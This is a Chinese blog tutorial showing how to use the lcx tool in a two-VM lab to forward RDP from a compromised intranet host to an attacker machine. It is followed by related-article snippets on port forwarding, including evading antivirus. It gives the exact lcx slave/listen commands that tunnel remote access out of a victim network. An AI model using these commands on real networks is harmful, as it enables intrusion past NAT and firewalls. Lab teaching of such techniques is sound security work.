网络安全系列之二 利用lcx实现内网端口转发

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行。如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射。
在网络攻防中,如果捕获了一台位于内网中的肉鸡,那么黑客是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了。下载地址:http://down.51cto.com/data/1878979

Lcx可以实现端口转发,将肉鸡A上的某个端口(如3389)转发到具有公网地址的主机B上,这样黑客只需连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有IP的限制。
下面在vmware中利用2台虚拟机来模拟操作,一台虚拟机作为黑客主机(IP地址192.168.80.128),另一台虚拟机作为肉鸡(IP地址192.168.80.129)。
首先将lcx分别放到这两台虚拟机的C盘根目录下,首先在肉鸡上执行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是将192.168.80.129上的3389端口转发到192.168.80.128上的5000端口。
然后再到黑客主机上执行命令“lcx –listen 5000 3389”,也就是在5000端口上监听,并将收到的数据转发到自己的3389端口上。此时在黑客主机上执行“netstat –an”命令,可以看到同时开放了5000和3389两个端口。
最后在黑客主机上打开mstsc,只需输入自己的IP地址(192.168.80.128或是127.0.0.1)便可以连接到肉鸡上了,从而实现内网突破。

时间: 2024-11-10 14:25:29

网络安全系列之二 利用lcx实现内网端口转发的相关文章

我是如何逃过所有杀软进行内网端口转发的

作者: Striker 平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发. 常见的端口转发 lcx.exe nc.exe Using php/jsp/aspx Script iptables端口转发 nginx端口转发 等等...... 其中lcx.exe.nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!) 我是一个非常喜欢渗透测试的人,并且颜值比较高(啊,打我干啥!) 偶尔也会用到内网渗透,进行端口转发

内网端口转发方法汇总

内网端口转发方法汇总 I. Sample Baklinks with "lcx.exe" first download lcx.exe from attach.blackbap.org/down/yclj/lcx.exe the program only can running in Windows Server, the program can backlink 3389 to another server. Opening and Listening a Port(like 333

SSH 内网端口转发实战

导读 大家都知道SSH是一种安全的传输协议,用在连接服务器上比较多.不过其实除了这个功能,它的隧道转发功能更是吸引人. 如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧没有公网IP,可以使用的方法有ngrok(https://ngrok.com/),但并不方便,我们只需两条 SSH 命令即可. 先给出本文主角,两条SSH命令: 远程端口转发(由远程服务器某个端口转发到本地内网服务器端口) ssh   -CfNg  -R(命令行的关键)   2222(远程服务器端口

WlMAP:突破内网端口转发映射工具

使用说明 Wlmap包括服务端程序和客户端程序两部分 服务端程序Wlmaps一般架设到其它用户可以访问到的地方例如internet,它主要用来记录客户端信息以及端口映射信息,并且转发用户和客户端之间数据.客户端程序主程序完成和Wlmaps的交互,包括认证.映射内部服务到Wlmaps的某个端口.维护数据转发通道同时转发Wlmaps和内部服务之间的数据交互. 第一部分: 服务端Wlmaps 1.如何运行Wlmaps DOS命令 : Wlmaps.exe -p -s -p:指定Wlmaps服务的端口,

(原创)校园卡破解系列三(完结篇)---内网渗透

上午大课间十几分钟搞定! 在班上电脑  因为内网渗透 先看看本地ip  172.18.33.38 然后就想着扫一下网段  随手输了172.18.32.0-172.18.33.0 扫内网端口的工具挺多的  最顺手其实是kali里面用msf一个模块扫 那个能直接爆破一些端口 但是考虑到班上电脑xp的辣鸡机子 而且时间不允许 所以直接写个php来扫内网端口也就是如图的 13.php 下载个phpstudy+这个文件  5分钟搞定 扫完就第一眼看到 172.18.32.5开了个8000端口  下意识猜测

搭建nginx反向代理用做内网域名转发

基于域名的7层转发的实现(NAT+反向代理) 在实际办公网中,因为出口IP只有一个,要实现对外提供服务的话就必须得做端口映射,如果有多个服务要对外开放的话,这只能通过映射不同端口来区分,这在实际使用过程中非常的痛苦(记忆困难.一一对应关系也没有规律.访问的时候还得加端口),这个痛苦的问题用表格的形式来形象的描述如下: Public IP Public Port Number Internal IP Internal Port Number Note 1.1.1.1 80 192.168.1.10

SSH原理与运用(二):远程操作与端口转发

本问转载自  http://www.ruanyifeng.com/blog/2011/12/ssh_port_forwarding.html SSH原理与运用(二):远程操作与端口转发 作者: 阮一峰 日期: 2011年12月23日 接着前一次的文章,继续介绍SSH的用法. ======================================= 作者:阮一峰 (Image credit: Tony Narlock) 七.远程操作 SSH不仅可以用于远程主机登录,还可以直接在远程主机上执行

[转帖]SSH原理与运用(二):远程操作与端口转发

SSH原理与运用(二):远程操作与端口转发 http://www.ruanyifeng.com/blog/2011/12/ssh_port_forwarding.html 接着前一次的文章,继续介绍SSH的用法. ======================================= SSH原理与运用(二):远程操作与端口转发 作者:阮一峰 (Image credit: Tony Narlock) 七.远程操作 SSH不仅可以用于远程主机登录,还可以直接在远程主机上执行操作. 上一节的操

nginx根据项目名实现内网地址转发

nginx根据访问的项目名进行内网地址转发 以下是nginx的配置信息: server { listen 8081; server_name localhost; #charset koi8-r; #access_log logs/host.access.log main; location / { root html; index index.html index.htm; } #匹配以访问的项目名跳转到对应的内网地址 location /huwj { proxy_pass http://12